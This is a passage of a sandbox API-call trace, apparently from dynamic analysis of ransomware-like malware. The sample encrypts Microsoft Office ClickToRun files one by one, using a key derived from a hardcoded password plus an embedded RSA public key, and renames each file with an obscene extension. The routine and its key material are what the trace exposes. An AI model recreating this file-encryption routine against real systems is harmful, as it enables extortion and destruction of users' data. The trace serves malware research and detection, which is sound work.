users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.036] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.037] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.gsg", dwFileAttributes=0x2) returned 0 [0239.037] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28833e8) returned 1 [0239.039] CryptCreateHash (in: hProv=0x28833e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.039] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.039] CryptHashData (hHash=0x2893af0, pbData=0x2884fa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.039] CryptDeriveKey (in: hProv=0x28833e8, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893bf0) returned 1 [0239.040] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.040] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.040] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882f20) returned 1 [0239.040] CryptImportPublicKeyInfo (in: hCryptProv=0x2882f20, dwCertEncodingType=0x1, pInfo=0x2896f60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896f90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896f98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893d30) returned 1 [0239.041] CryptEncrypt (in: hKey=0x2893d30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.041] CryptEncrypt (in: hKey=0x2893d30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2883690*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2883690*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.041] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2883690, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.041] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.041] CryptEncrypt (in: hKey=0x2893bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.041] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.041] CloseHandle (hObject=0xffffffff) returned 1 [0239.041] CloseHandle (hObject=0xffffffff) returned 1 [0239.041] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash"), bFailIfExists=0) returned 0 [0239.042] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash", dwFileAttributes=0x0) returned 0 [0239.043] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash.gsg")) returned 0 [0239.043] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash.fuck")) returned 0 [0239.044] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.044] CryptDestroyKey (hKey=0x2893bf0) returned 1 [0239.044] CryptReleaseContext (hProv=0x28833e8, dwFlags=0x0) returned 1 [0239.044] FindNextFileA (in: hFindFile=0x2893eb0, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.044] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.044] GetLastError () returned 0x5 [0239.044] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml")) returned 0x20 [0239.044] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml", dwFileAttributes=0x80) returned 0 [0239.045] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.045] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.046] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.046] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.049] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.049] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.049] CryptHashData (hHash=0x2893bf0, pbData=0x2885138, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.049] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893bf0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893af0) returned 1 [0239.049] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.049] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.049] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2883828) returned 1 [0239.049] CryptImportPublicKeyInfo (in: hCryptProv=0x2883828, dwCertEncodingType=0x1, pInfo=0x28965a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28965d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28965d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893ff0) returned 1 [0239.050] CryptEncrypt (in: hKey=0x2893ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.050] CryptEncrypt (in: hKey=0x2893ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882fa8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2882fa8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.050] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882fa8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.050] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.050] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.050] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.050] CloseHandle (hObject=0xffffffff) returned 1 [0239.050] CloseHandle (hObject=0xffffffff) returned 1 [0239.050] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml"), bFailIfExists=0) returned 0 [0239.051] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml", dwFileAttributes=0x0) returned 0 [0239.051] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml.gsg")) returned 0 [0239.052] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml.fuck")) returned 0 [0239.052] CryptDestroyHash (hHash=0x2893bf0) returned 1 [0239.052] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.052] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.052] FindNextFileA (in: hFindFile=0x2893eb0, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.052] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.052] GetLastError () returned 0x5 [0239.052] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash")) returned 0x20 [0239.053] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash", dwFileAttributes=0x80) returned 0 [0239.053] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.053] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.054] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.gsg", dwFileAttributes=0x2) returned 0 [0239.054] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.057] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.057] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.057] CryptHashData (hHash=0x2893b70, pbData=0x2885048, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.057] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893bf0) returned 1 [0239.057] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.057] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.057] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2883580) returned 1 [0239.058] CryptImportPublicKeyInfo (in: hCryptProv=0x2883580, dwCertEncodingType=0x1, pInfo=0x2897030*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897060*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897068*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893c70) returned 1 [0239.058] CryptEncrypt (in: hKey=0x2893c70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.058] CryptEncrypt (in: hKey=0x2893c70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28833e8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28833e8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.058] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28833e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.058] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.058] CryptEncrypt (in: hKey=0x2893bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.058] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.059] CloseHandle (hObject=0xffffffff) returned 1 [0239.059] CloseHandle (hObject=0xffffffff) returned 1 [0239.059] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash"), bFailIfExists=0) returned 0 [0239.059] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash", dwFileAttributes=0x0) returned 0 [0239.060] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash.gsg")) returned 0 [0239.060] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash.fuck")) returned 0 [0239.061] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.061] CryptDestroyKey (hKey=0x2893bf0) returned 1 [0239.061] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.061] FindNextFileA (in: hFindFile=0x2893eb0, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.061] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.061] GetLastError () returned 0x5 [0239.061] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat")) returned 0x20 [0239.061] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x80) returned 0 [0239.062] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.062] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.063] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0239.063] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.065] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.065] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.066] CryptHashData (hHash=0x2893e70, pbData=0x2885098, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.066] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893e70, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893af0) returned 1 [0239.066] 